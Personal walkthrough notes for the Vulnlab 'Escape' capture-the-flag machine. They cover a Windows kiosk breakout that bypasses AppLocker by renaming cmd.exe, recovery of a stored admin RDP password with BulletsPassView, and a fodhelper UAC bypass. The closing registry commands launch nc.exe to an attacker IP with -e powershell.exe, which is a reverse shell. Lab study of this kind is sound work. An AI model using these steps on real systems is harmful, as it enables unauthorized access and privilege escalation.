Here is my notes on ESCAPE box from Vulnlab
ESCAPE: 10.10.97.0
Kiosk Escape:
https://ppn.snovvcrash.rocks/pentest/infrastructure/kiosk-breakout
Breaking out of Windows Kiosks using only Microsoft Edge
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/
Windows:
rdesktop 10.10.97.0 -u KioskUser0
-Login without password.
First thing to use Windows Key.
CMD = NOPE due to Applocker
Load edge in Windows Start as usual.
file://C:/
file://C:/Windows/System32/cmd.exe
download it and rename it to msedge like msedge.exe for cmd.exe
Run it to gain a shell.
Applocker only scan the name not the file.
C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0
C:\Users\kioskUser0\Downloads>hostname
Escape
USER-SHELL !
PS C:\Users\kioskUser0\Desktop> whoami
escape\kioskuser0
PS C:\Users\kioskUser0\Desktop> hostname
Escape
PS C:\Users\kioskUser0\Desktop> dir
Directory: C:\Users\kioskUser0\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 3:47 AM 2352 Microsoft Edge.lnk
-a---- 2/3/2024 3:48 AM 36 user_07eb46.txt
PS C:\Users\kioskUser0\Desktop> type user_07eb46.txt
VL{[REDIRECTED]}
USER.TXT: VL{[REDIRECTED]}
PRIV ESC:
kioskuser0 -> admin medium intergrity.
Discovere C:\_admin\profiles.xml
C:\_admin>type profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
There is RDP plus so let's import this profile.
there is admin and bulletpass like this ****.
BulletsPassView NOTES:
https://www.nirsoft.net/utils/bullets_password_view.html
https://www.nirsoft.net/utils/bulletspassview.zip
https://www.nirsoft.net/utils/bulletspassview-x64.zip
Load BulletsPassView.exe (64-Bit Version) first.
Import profiles.xml into rdp.exe
Click edit and you will see bulletpass.
Go back and click refresh in BulletPassView and you should see the password.
admin:[REDIRECTED]
https://aditya-3.gitbook.io/oscp/readme/walkthroughs/vuln-lab/escape-vulnlab
vulnlab-escape
https://bushidosan.com/posts/vl-escape/
runas /user:admin "cmd.exe"
C:\Windows\system32>whoami
escape\admin
C:\Windows\system32>hostname
Escape
admin shell !
We do get admin shell as a part of administrator group however it's in medium intergrity so UAC-BYPASS as usual.
Import-Module .\FodhelperBypass.ps1
FodhelperBypass - Lauch Powershell in High Intergrity.
HIGH ADMIN PRIV SHELL !
PS C:\users\Administrator\Desktop> whoami
escape\admin
PS C:\users\Administrator\Desktop> hostname
Escape
PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 9:07 AM 2332 Microsoft Edge.lnk
-a---- 2/3/2024 3:48 AM 36 root.txt
PS C:\users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Different Ways to do UAC Bypass:
start-process cmd.exe -verb runas
Start-Process powershell -verb runAs
#This only works if you have an administrator password and in Windows GUI or RDP session.
UAC-BYPASS Reverse-Shell:
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.2.138 9001 -e powershell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden